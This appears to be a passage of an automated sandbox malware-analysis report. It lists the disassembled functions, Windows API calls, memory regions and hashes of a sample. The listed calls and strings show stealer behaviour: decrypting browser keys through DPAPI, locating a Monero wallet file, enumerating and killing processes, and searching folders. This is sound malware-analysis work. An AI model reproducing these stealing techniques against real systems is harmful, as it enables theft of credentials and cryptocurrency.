                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 7977e20aa3bb9fcb9544c945705810bbb443c4e5debaafc901bd64d513cab2c7
                                  • Instruction ID: 535d4a809d7d3d904522abd8890ff457a295e9ddefde4f4e5f95437efc4c2656
                                  • Opcode Fuzzy Hash: 7977e20aa3bb9fcb9544c945705810bbb443c4e5debaafc901bd64d513cab2c7
                                  • Instruction Fuzzy Hash: 9F3143B6D01209ABCF14DFD5DC45AEFB7B8BF58304F444518E905A7245E738AE14CB62
                                  Function 007F9660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 007F967B
                                    • Part of subcall function 007F8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007F96AE,00000000), ref: 007F8EEB
                                    • Part of subcall function 007F8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 007F8EF2
                                    • Part of subcall function 007F8EE0: wsprintfW.USER32 ref: 007F8F08
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 007F973B
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9759
                                  • CloseHandle.KERNEL32(00000000), ref: 007F9766
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 73220d4e94252da191969d4325a8672647807620e711dadc64612137e5e2a572
                                  • Instruction ID: cf022be762b14cd7f5513c02ddd33ff676c1cccdc46c968f9ad85cfd1f2ec51a
                                  • Opcode Fuzzy Hash: 73220d4e94252da191969d4325a8672647807620e711dadc64612137e5e2a572
                                  • Instruction Fuzzy Hash: A9313CB5A1030CEBDB14DFE0CD49BEDB778BB44700F104558F606AB295DBB86A49CB61
                                  Function 007F8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008005BF), ref: 007F885A
                                  • Process32First.KERNEL32(?,00000128), ref: 007F886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 007F8883
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • CloseHandle.KERNEL32(?), ref: 007F88F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: a10f58070b0983b4e941522d79e54c250cb843eb7c8a7ae65adc77baf675c1bd
                                  • Instruction ID: 996678b70dd9b9272963633c88bb91c1629ce6fb58959c855e04a92457f591d0
                                  • Opcode Fuzzy Hash: a10f58070b0983b4e941522d79e54c250cb843eb7c8a7ae65adc77baf675c1bd
                                  • Instruction Fuzzy Hash: 5D314BB1901218EBCB64DB94DC55BEEB778EB44740F104299E20EA22A0DB786A44CFA1
                                  Function 0085FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0085FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0085FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: f9c999a71f16f71a2f6fad7d69b7890161bfcbdb6b9e923a841e4e5f72090827
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 0101B13210ABA5EEFE3426785CCA96A2694FB017B67354339FA16C81F3EF514C499242
                                  Function 007F9470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(007F3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,007F3D3E,?), ref: 007F948C
                                  • GetFileSizeEx.KERNEL32(000000FF,007F3D3E), ref: 007F94A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 007F94B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 68fa8018a2a177fd860959a4787ddb7fef41d400bcf00cf06dd1c599311d381c
                                  • Instruction ID: 860718a94838801ec8d823c2e943f60251af62d39045fc2a59e39e9be640b6da
                                  • Opcode Fuzzy Hash: 68fa8018a2a177fd860959a4787ddb7fef41d400bcf00cf06dd1c599311d381c
                                  • Instruction Fuzzy Hash: 3EF03135E04208BBDB10DFF4EC49F6F77B9AB98710F108654FB11A7290D67496028B50
                                  Function 007FCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 007FCA7E
                                    • Part of subcall function 007FC2A0: __amsg_exit.LIBCMT ref: 007FC2B0
                                  • __getptd.LIBCMT ref: 007FCA95
                                  • __amsg_exit.LIBCMT ref: 007FCAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 007FCAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 5a661a4395b22e25c6596b9e03c6aa4b7f1ec5739550426b78d3c99e7463c2e6
                                  • Instruction ID: 4032eeaa56adc3d9cb4497c53e8499f4b7ba217ec8fee36b6fa5d0ac0481c16e
                                  • Opcode Fuzzy Hash: 5a661a4395b22e25c6596b9e03c6aa4b7f1ec5739550426b78d3c99e7463c2e6
                                  • Instruction Fuzzy Hash: F2F0963194471DDBD666FBB8990B77E33A0BF00720F158149F714A63D2CB2C69409695
                                  Function 008604D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: 7b0daca6f2283fdf69d2607ec29c2ade5b398db93529f5a980a724144bf923c3
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: 7E417871900209AFCF16DF98DC85AAEBBB5FF48300F1A8199FA05B7211D3359A50DF55
                                  Function 007F5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F51CA
                                  • lstrcat.KERNEL32(?,00801058), ref: 007F51E7
                                  • lstrcat.KERNEL32(?,01458BB0), ref: 007F51FB
                                  • lstrcat.KERNEL32(?,0080105C), ref: 007F520D
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4B7C
                                    • Part of subcall function 007F4B60: FindFirstFileA.KERNEL32(?,?), ref: 007F4B93
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC4), ref: 007F4BC1
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC8), ref: 007F4BD7
                                    • Part of subcall function 007F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DCD
                                    • Part of subcall function 007F4B60: FindClose.KERNEL32(000000FF), ref: 007F4DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 3ed791132b4f3764c807de38e63586d5c874843ad89e84a3f55310695c5dd22e
                                  • Instruction ID: c9fc5bffdb16ba21deb4b7588486a88713f18bdbe88b7f24fa2d787f78cb875d
                                  • Opcode Fuzzy Hash: 3ed791132b4f3764c807de38e63586d5c874843ad89e84a3f55310695c5dd22e
                                  • Instruction Fuzzy Hash: 7D21A0F650420CEBDB54F7B0EC57EFD333C9798300F404654B65596192DE789AC98B52